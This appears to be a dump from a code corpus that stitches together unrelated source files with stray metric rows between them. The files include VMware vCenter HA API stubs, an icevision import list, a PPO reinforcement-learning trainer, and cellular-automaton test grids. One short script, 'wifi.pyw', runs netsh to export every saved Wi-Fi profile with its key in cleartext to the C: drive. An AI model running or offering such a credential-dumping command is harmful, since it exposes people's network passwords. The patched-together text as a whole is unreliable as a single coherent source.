'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.unverified_peer':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
'com.vmware.vapi.std.errors.invalid_element_configuration':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidElementConfiguration'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/vcha/cluster/active',
path_variables={
},
query_parameters={
}
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType(__name__, 'Active.Info'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.vcha.cluster.active',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _DeploymentTypeStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/vcha/cluster/deployment-type',
path_variables={
},
query_parameters={
}
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType(__name__, 'DeploymentType.Info'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.vcha.cluster.deployment_type',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _ModeStub(ApiInterfaceStub):
    def __init__(self, config):
        # properties for get operation
        get_input_type = type.StructType('operation-input', {})
        get_error_dict = {
            'com.vmware.vapi.std.errors.not_allowed_in_current_state':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotAllowedInCurrentState'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/vcenter/vcha/cluster/mode',
            path_variables={
            },
            query_parameters={
            }
        )
        # properties for set operation
        set_input_type = type.StructType('operation-input', {
            'mode': type.ReferenceType(__name__, 'Mode.ClusterMode'),
        })
        set_error_dict = {
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
        }
        set_input_value_validator_list = [
        ]
        set_output_validator_list = [
        ]
        set_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/vcenter/vcha/cluster/mode',
            path_variables={
            },
            query_parameters={
            }
        )
        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType(__name__, 'Mode.Info'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'set$task': {
                'input_type': set_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': set_error_dict,
                'input_value_validator_list': set_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'set': set_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.vcenter.vcha.cluster.mode',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=True)
class _PassiveStub(ApiInterfaceStub):
    def __init__(self, config):
        # properties for check operation
        check_input_type = type.StructType('operation-input', {
            'spec': type.ReferenceType(__name__, 'Passive.CheckSpec'),
        })
        check_error_dict = {
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.unverified_peer':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.invalid_element_configuration':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidElementConfiguration'),
            'com.vmware.vapi.std.errors.not_allowed_in_current_state':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotAllowedInCurrentState'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
        }
        check_input_value_validator_list = [
        ]
        check_output_validator_list = [
        ]
        check_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/vcenter/vcha/cluster/passive',
            path_variables={
            },
            query_parameters={
            }
        )
        # properties for redeploy operation
        redeploy_input_type = type.StructType('operation-input', {
            'spec': type.ReferenceType(__name__, 'Passive.RedeploySpec'),
        })
        redeploy_error_dict = {
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.unverified_peer':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
        }
        redeploy_input_value_validator_list = [
        ]
        redeploy_output_validator_list = [
        ]
        redeploy_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/vcenter/vcha/cluster/passive',
            path_variables={
            },
            query_parameters={
            }
        )
        operations = {
            'check': {
                'input_type': check_input_type,
                'output_type': type.ReferenceType(__name__, 'Passive.CheckResult'),
                'errors': check_error_dict,
                'input_value_validator_list': check_input_value_validator_list,
                'output_validator_list': check_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'redeploy$task': {
                'input_type': redeploy_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': redeploy_error_dict,
                'input_value_validator_list': redeploy_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
        }
        rest_metadata = {
            'check': check_rest_metadata,
            'redeploy': redeploy_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.vcenter.vcha.cluster.passive',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=True)
class _WitnessStub(ApiInterfaceStub):
    def __init__(self, config):
        # properties for check operation
        check_input_type = type.StructType('operation-input', {
            'spec': type.ReferenceType(__name__, 'Witness.CheckSpec'),
        })
        check_error_dict = {
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.unverified_peer':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            'com.vmware.vapi.std.errors.invalid_element_configuration':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidElementConfiguration'),
            'com.vmware.vapi.std.errors.not_allowed_in_current_state':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotAllowedInCurrentState'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
        }
        check_input_value_validator_list = [
        ]
        check_output_validator_list = [
        ]
        check_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/vcenter/vcha/cluster/witness',
            path_variables={
            },
            query_parameters={
            }
        )
        # properties for redeploy operation
        redeploy_input_type = type.StructType('operation-input', {
            'spec': type.ReferenceType(__name__, 'Witness.RedeploySpec'),
        })
        redeploy_error_dict = {
            'com.vmware.vapi.std.errors.invalid_argument':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.unverified_peer':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
            'com.vmware.vapi.std.errors.error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
        }
        redeploy_input_value_validator_list = [
        ]
        redeploy_output_validator_list = [
        ]
        redeploy_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/vcenter/vcha/cluster/witness',
            path_variables={
            },
            query_parameters={
            }
        )
        operations = {
            'check': {
                'input_type': check_input_type,
                'output_type': type.ReferenceType(__name__, 'Witness.CheckResult'),
                'errors': check_error_dict,
                'input_value_validator_list': check_input_value_validator_list,
                'output_validator_list': check_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'redeploy$task': {
                'input_type': redeploy_input_type,
                'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
                'errors': redeploy_error_dict,
                'input_value_validator_list': redeploy_input_value_validator_list,
                'output_validator_list': [],
                'task_type': TaskType.TASK_ONLY,
            },
        }
        rest_metadata = {
            'check': check_rest_metadata,
            'redeploy': redeploy_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.vcenter.vcha.cluster.witness',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=True)
class StubFactory(StubFactoryBase):
    _attrs = {
        'Active': Active,
        'DeploymentType': DeploymentType,
        'Mode': Mode,
        'Passive': Passive,
        'Witness': Witness,
    }
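Each generated stub above wires parallel tables keyed by operation name — input/output types, error maps, and REST metadata — and hands them to `ApiInterfaceStub` for dispatch. A minimal, library-independent sketch of that registry pattern (`MiniStub` and its names are hypothetical, not part of the `com.vmware.vapi` runtime):

```python
class MiniStub:
    """Toy registry: operation name -> (HTTP method, URL template)."""

    def __init__(self, iface_name, rest_metadata):
        self.iface_name = iface_name
        self.rest_metadata = rest_metadata

    def describe(self, operation):
        # Resolve an operation through the table, as a dispatcher would.
        method, url = self.rest_metadata[operation]
        return f"{method} {url}  ({self.iface_name}.{operation})"

stub = MiniStub(
    "com.vmware.vcenter.vcha.cluster.active",
    {"get": ("POST", "/vcenter/vcha/cluster/active")},
)
```

Keeping the metadata in plain dicts is what lets one generic dispatcher serve every generated interface.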
# --- icevision/models/mmdet/models/__init__.py (dnth/icevision, Apache-2.0) ---
# object detection
from icevision.models.mmdet.models import faster_rcnn
from icevision.models.mmdet.models import yolox
from icevision.models.mmdet.models import retinanet
from icevision.models.mmdet.models import fcos
from icevision.models.mmdet.models import tood
from icevision.models.mmdet.models import vfnet
from icevision.models.mmdet.models import cornernet
from icevision.models.mmdet.models import centripetalnet
from icevision.models.mmdet.models import sparse_rcnn
from icevision.models.mmdet.models import ssd
from icevision.models.mmdet.models import detr
# segmentation
from icevision.models.mmdet.models import mask_rcnn
| 39.9375 | 56 | 0.856025 | 90 | 639 | 6.044444 | 0.233333 | 0.286765 | 0.419118 | 0.529412 | 0.808824 | 0.808824 | 0.147059 | 0 | 0 | 0 | 0 | 0 | 0.084507 | 639 | 15 | 57 | 42.6 | 0.929915 | 0.045383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
65991f4beee1a2d7e5321c9f54a58e4f290c9a60 | 14,959 | py | Python | core/algorithms/lacie/lacie_ppo.py | lehduong/Input-Dependent-Baseline | cb140338eb35a568fe1d320d0b8e52b739470b59 | [
"Apache-2.0"
] | 4 | 2020-12-05T18:51:03.000Z | 2022-01-03T16:04:35.000Z | core/algorithms/lacie/lacie_ppo.py | lehduong/Job-Scheduling-with-Reinforcement-Learning | cb140338eb35a568fe1d320d0b8e52b739470b59 | [
"Apache-2.0"
] | null | null | null | core/algorithms/lacie/lacie_ppo.py | lehduong/Job-Scheduling-with-Reinforcement-Learning | cb140338eb35a568fe1d320d0b8e52b739470b59 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from itertools import chain
from .base_lacie import LacieAlgo
class LACIE_PPO(LacieAlgo):
def __init__(self,
actor_critic,
clip_param,
ppo_epoch,
num_mini_batch,
value_loss_coef,
entropy_coef,
regularize_coef,
state_to_input_seq=None,
lr=None,
eps=None,
max_grad_norm=None,
use_clipped_value_loss=True,
expert=None,
il_coef=1,
num_cpc_steps=10,
cpc_lr=1e-3):
super().__init__(actor_critic=actor_critic,
lr=lr,
value_coef=value_loss_coef,
entropy_coef=entropy_coef,
regularize_coef=regularize_coef,
state_to_input_seq=state_to_input_seq,
expert=expert,
il_coef=il_coef,
num_cpc_steps=num_cpc_steps,
cpc_lr=cpc_lr)
self.clip_param = clip_param
self.ppo_epoch = ppo_epoch
self.num_mini_batch = num_mini_batch
self.max_grad_norm = max_grad_norm
self.use_clipped_value_loss = use_clipped_value_loss
def update(self, rollouts):
obs_shape = rollouts.obs.size()[2:]
advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]
# contrastive learning loss
contrastive_loss_epoch, contrastive_accuracy_epoch = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
contrastive_loss_epoch = contrastive_loss_epoch.item()
# weighted advantages
weighted_advantages = self.compute_weighted_advantages(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
weighted_advantages = (weighted_advantages - weighted_advantages.mean()) / (
weighted_advantages.std() + 1e-5)
value_loss_epoch = 0
action_loss_epoch = 0
dist_entropy_epoch = 0
imitation_loss_epoch = 0
accuracy_epoch = 0
for e in range(self.ppo_epoch):
if self.actor_critic.is_recurrent:
data_generator = rollouts.recurrent_generator(
weighted_advantages, self.num_mini_batch)
else:
data_generator = rollouts.feed_forward_generator(
weighted_advantages, self.num_mini_batch)
for sample in data_generator:
obs_batch, recurrent_hidden_states_batch, actions_batch, \
value_preds_batch, return_batch, masks_batch, old_action_log_probs_batch, \
adv_targ = sample
# Reshape to do in a single forward pass for all steps
values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
obs_batch, recurrent_hidden_states_batch, masks_batch,
actions_batch)
ratio = torch.exp(action_log_probs -
old_action_log_probs_batch)
surr1 = ratio * adv_targ
surr2 = torch.clamp(ratio, 1.0 - self.clip_param,
1.0 + self.clip_param) * adv_targ
action_loss = -torch.min(surr1, surr2).mean()
if self.use_clipped_value_loss:
value_pred_clipped = value_preds_batch + \
(values - value_preds_batch).clamp(-self.clip_param,
self.clip_param)
value_losses = (values - return_batch).pow(2)
value_losses_clipped = (
value_pred_clipped - return_batch).pow(2)
value_loss = 0.5 * torch.max(value_losses,
value_losses_clipped).mean()
else:
value_loss = 0.5 * (return_batch - values).pow(2).mean()
# imitation learning
imitation_loss, accuracy = torch.tensor(
0).to(action_loss.device), 0
if self.expert:
imitation_loss, accuracy = self.imitation_learning(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[0].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
self.expert)
# contrastive learning density ratio
contrastive_loss, _ = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, advantages)
self.optimizer.zero_grad()
self.cpc_optimizer.zero_grad()
(imitation_loss * self.il_coef * self.value_coef + action_loss -
dist_entropy * self.entropy_coef + contrastive_loss).backward()
nn.utils.clip_grad_norm_(chain(self.actor_critic.parameters(),
self.input_seq_encoder.parameters(),
self.advantage_encoder.parameters(),
self.state_encoder.parameters(),
self.condition_encoder.parameters(),
self.action_encoder.parameters()),
self.max_grad_norm)
self.optimizer.step()
self.cpc_optimizer.step()
value_loss_epoch += value_loss.item()
action_loss_epoch += action_loss.item()
dist_entropy_epoch += dist_entropy.item()
imitation_loss_epoch += imitation_loss.item()
accuracy_epoch += accuracy
num_updates = self.ppo_epoch * self.num_mini_batch
value_loss_epoch /= num_updates
action_loss_epoch /= num_updates
dist_entropy_epoch /= num_updates
imitation_loss_epoch /= num_updates
accuracy_epoch /= num_updates
self.after_update()
return {
"value loss": value_loss_epoch,
"action loss": action_loss_epoch,
"entropy loss": dist_entropy_epoch,
"imitation loss": imitation_loss_epoch,
"accuracy": accuracy_epoch,
"contrastive loss": contrastive_loss_epoch,
"contrastive accuracy": contrastive_accuracy_epoch
}
class LACIE_PPO_Memory(LACIE_PPO):
def __init__(self,
actor_critic,
clip_param,
ppo_epoch,
num_mini_batch,
value_loss_coef,
entropy_coef,
regularize_coef,
state_to_input_seq=None,
lr=None,
eps=None,
max_grad_norm=None,
use_clipped_value_loss=True,
expert=None,
il_coef=1,
num_cpc_steps=10,
lacie_buffer=None,
lacie_batch_size=64,
use_memory_to_pred_weights=False,
cpc_lr=1e-3):
super().__init__(actor_critic,
clip_param,
ppo_epoch,
num_mini_batch,
value_loss_coef,
entropy_coef,
regularize_coef,
state_to_input_seq,
lr,
eps,
max_grad_norm,
use_clipped_value_loss,
expert,
il_coef,
num_cpc_steps,
cpc_lr=cpc_lr)
self.lacie_buffer = lacie_buffer
self.lacie_buffer_size = lacie_batch_size
self.use_memory_to_pred_weights = use_memory_to_pred_weights
def update(self, rollouts):
obs_shape = rollouts.obs.size()[2:]
advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]
# update LACIE_Storage
self.lacie_buffer.insert(rollouts, advantages.detach())
# contrastive learning loss
contrastive_loss_epoch, contrastive_accuracy_epoch, regularize_loss_epoch = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
contrastive_loss_epoch = contrastive_loss_epoch.item()
regularize_loss_epoch = regularize_loss_epoch.item()
# ---------------------------------------------------------------------------
# learn cpc model for n steps
for _ in range(self.num_cpc_steps):
data = self.lacie_buffer.sample()
obs, actions, masks, sample_advantages = data['obs'], data['actions'], data['masks'], data['advantages']
cpc_loss, _, cpc_regularize_loss = self.compute_contrastive_loss(
obs, actions, masks, sample_advantages)
self.cpc_optimizer.zero_grad()
(cpc_loss + self.regularize_coef * cpc_regularize_loss).backward()
nn.utils.clip_grad_norm_(chain(self.advantage_encoder.parameters(),
self.input_seq_encoder.parameters(),
self.state_encoder.parameters(),
self.condition_encoder.parameters(),
self.action_encoder.parameters()),
self.max_grad_norm)
self.cpc_optimizer.step()
# weighted advantages
if not self.use_memory_to_pred_weights:
weighted_advantages = self.compute_weighted_advantages(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
else:
data = self.lacie_buffer.sample_most_recent()
obs, actions, masks, sample_advantages = data['obs'], data[
'actions'], data['masks'], data['advantages']
weighted_advantages = self.compute_weighted_advantages(
obs, actions, masks, sample_advantages, rollouts.actions.shape[1])
# normalize advantages
# TODO: Conduct Ablation Study to verify if we should normalize the advantages or not
weighted_advantages = (weighted_advantages - weighted_advantages.mean()) / (
weighted_advantages.std() + 1e-5)
# ---------------------------------------------------------------------------
# learn actor and critic
value_loss_epoch = 0
action_loss_epoch = 0
dist_entropy_epoch = 0
imitation_loss_epoch = 0
accuracy_epoch = 0
for e in range(self.ppo_epoch):
if self.actor_critic.is_recurrent:
data_generator = rollouts.recurrent_generator(
weighted_advantages, self.num_mini_batch)
else:
data_generator = rollouts.feed_forward_generator(
weighted_advantages, self.num_mini_batch)
for sample in data_generator:
obs_batch, recurrent_hidden_states_batch, actions_batch, \
value_preds_batch, return_batch, masks_batch, old_action_log_probs_batch, \
adv_targ = sample
# Reshape to do in a single forward pass for all steps
values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
obs_batch, recurrent_hidden_states_batch, masks_batch,
actions_batch)
ratio = torch.exp(action_log_probs -
old_action_log_probs_batch)
surr1 = ratio * adv_targ
surr2 = torch.clamp(ratio, 1.0 - self.clip_param,
1.0 + self.clip_param) * adv_targ
action_loss = -torch.min(surr1, surr2).mean()
if self.use_clipped_value_loss:
value_pred_clipped = value_preds_batch + \
(values - value_preds_batch).clamp(-self.clip_param,
self.clip_param)
value_losses = (values - return_batch).pow(2)
value_losses_clipped = (
value_pred_clipped - return_batch).pow(2)
value_loss = 0.5 * torch.max(value_losses,
value_losses_clipped).mean()
else:
value_loss = 0.5 * (return_batch - values).pow(2).mean()
# imitation learning
imitation_loss, accuracy = torch.tensor(
0).to(action_loss.device), 0
if self.expert:
imitation_loss, accuracy = self.imitation_learning(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[0].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
self.expert)
self.optimizer.zero_grad()
(imitation_loss * self.il_coef * self.value_coef + action_loss -
dist_entropy * self.entropy_coef).backward()
nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
self.max_grad_norm)
self.optimizer.step()
value_loss_epoch += value_loss.item()
action_loss_epoch += action_loss.item()
dist_entropy_epoch += dist_entropy.item()
imitation_loss_epoch += imitation_loss.item()
accuracy_epoch += accuracy
num_updates = self.ppo_epoch * self.num_mini_batch
value_loss_epoch /= num_updates
action_loss_epoch /= num_updates
dist_entropy_epoch /= num_updates
imitation_loss_epoch /= num_updates
accuracy_epoch /= num_updates
self.after_update()
return {
"value loss": value_loss_epoch,
"action loss": action_loss_epoch,
"entropy loss": dist_entropy_epoch,
"imitation loss": imitation_loss_epoch,
"accuracy": accuracy_epoch,
"contrastive loss": contrastive_loss_epoch,
"contrastive accuracy": contrastive_accuracy_epoch,
"regularization loss": regularize_loss_epoch
}
| 43.868035 | 116 | 0.53914 | 1,475 | 14,959 | 5.088814 | 0.105763 | 0.043165 | 0.017586 | 0.017719 | 0.868239 | 0.819877 | 0.806155 | 0.785505 | 0.767253 | 0.739408 | 0 | 0.008745 | 0.380841 | 14,959 | 340 | 117 | 43.997059 | 0.801663 | 0.040043 | 0 | 0.764493 | 0 | 0 | 0.0175 | 0 | 0 | 0 | 0 | 0.002941 | 0 | 1 | 0.014493 | false | 0 | 0.021739 | 0 | 0.050725 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
659f142ea9d518b62ae4e2c8ea36aca31095e0f5 | 112 | py | Python | tests/fixtures/fixture_module_w_class.py | irvingleonard/simplifiedapp | aeb3353df1d5110f0cd4ae33465bc9a2f0190173 | [
"BSD-2-Clause"
] | null | null | null | tests/fixtures/fixture_module_w_class.py | irvingleonard/simplifiedapp | aeb3353df1d5110f0cd4ae33465bc9a2f0190173 | [
"BSD-2-Clause"
] | 13 | 2020-07-03T20:09:05.000Z | 2022-02-28T23:35:56.000Z | tests/fixtures/fixture_module_w_class.py | irvingleonard/simplifiedapp | aeb3353df1d5110f0cd4ae33465bc9a2f0190173 | [
"BSD-2-Clause"
] | 1 | 2021-08-30T22:19:02.000Z | 2021-08-30T22:19:02.000Z | class TestClass:
def __init__(self, *args, **kwargs):
pass
def test_method(self, *args, **kwargs):
pass
# --- AI/day03/XRAI/Submit/network.py (Ersikan/Pool2021, MIT) ---
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
# --- network/wifi.pyw (simdok/Dedsecurity, MIT) ---
import os
os.system("netsh wlan show profile")
os.system("netsh wlan export profile folder=C:\ key=clear")
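The script above shells out via `os.system` with hand-built command strings. An alternative sketch (`netsh_export_cmd` is hypothetical, not in the original) builds the same `netsh` invocation as an argument list for `subprocess.run`, which sidesteps shell quoting of paths such as the bare `C:\ ` above:

```python
import subprocess

def netsh_export_cmd(folder, key_clear=True):
    """Build the netsh export invocation as an argv list."""
    cmd = ["netsh", "wlan", "export", "profile", f"folder={folder}"]
    if key_clear:
        cmd.append("key=clear")
    return cmd

# On Windows one would run it like this (left commented out here):
# subprocess.run(netsh_export_cmd("C:\\"), check=True)
```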
# --- tests/Totalistic2D_knowns.py (godzilla-but-nicer/cellularautomata, MIT) ---
import numpy as np
gol_glider = np.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]])
gol_glider_next = np.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 0, 1, 0],
[0, 0, 1, 1, 0],
[0, 0, 1, 0, 0]])
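`gol_glider` and `gol_glider_next` above are one generation apart under Conway's Game of Life rules, with cells outside the 5x5 grid treated as dead. A small pure-Python step function (`life_step` is an illustrative helper, not part of the fixtures) can verify that relationship:

```python
glider = [
    [0, 0, 0, 0, 0],
    [0, 0, 1, 0, 0],
    [0, 0, 0, 1, 0],
    [0, 1, 1, 1, 0],
    [0, 0, 0, 0, 0],
]
glider_next = [
    [0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0],
    [0, 1, 0, 1, 0],
    [0, 0, 1, 1, 0],
    [0, 0, 1, 0, 0],
]

def life_step(grid):
    """One Game of Life step; cells beyond the border count as dead."""
    h, w = len(grid), len(grid[0])
    nxt = [[0] * w for _ in range(h)]
    for r in range(h):
        for c in range(w):
            n = sum(
                grid[r + dr][c + dc]
                for dr in (-1, 0, 1)
                for dc in (-1, 0, 1)
                if (dr, dc) != (0, 0)
                and 0 <= r + dr < h
                and 0 <= c + dc < w
            )
            # survival on 2-3 neighbours, birth on exactly 3
            nxt[r][c] = 1 if n == 3 or (grid[r][c] == 1 and n == 2) else 0
    return nxt

assert life_step(glider) == glider_next
```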
gol_series = np.array([[[0, 0, 0, 0, 0, 0], # 0
[0, 1, 0, 1, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 1, 0, 1, 0, 1],
[0, 1, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 1
[0, 1, 0, 1, 0, 0],
[0, 1, 0, 1, 1, 0],
[0, 1, 0, 1, 1, 0],
[1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 2
[0, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[0, 1, 1, 0, 1, 1],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 3
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 4
[0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 5
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 6
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]])
dl_glider = np.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 2, 0],
[0, 2, 2, 2, 0],
[0, 0, 0, 0, 0]])
dl_glider_next = np.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 2, 0],
[0, 1, 2, 2, 0],
[0, 0, 2, 0, 0]])
dl_series = np.array([[[0, 2, 0, 1], # 0
[2, 1, 2, 0],
[0, 1, 1, 0],
[0, 0, 0, 2]],
[[2, 2, 2, 1], # 1
[1, 0, 1, 0],
[0, 2, 2, 2],
[0, 0, 0, 1]],
[[1, 2, 1, 0], # 2
[0, 0, 0, 0],
[0, 1, 2, 1],
[0, 0, 0, 0]],
[[1, 1, 1, 0], # 3
[0, 0, 0, 0],
[0, 1, 1, 1],
[0, 0, 0, 0]]])
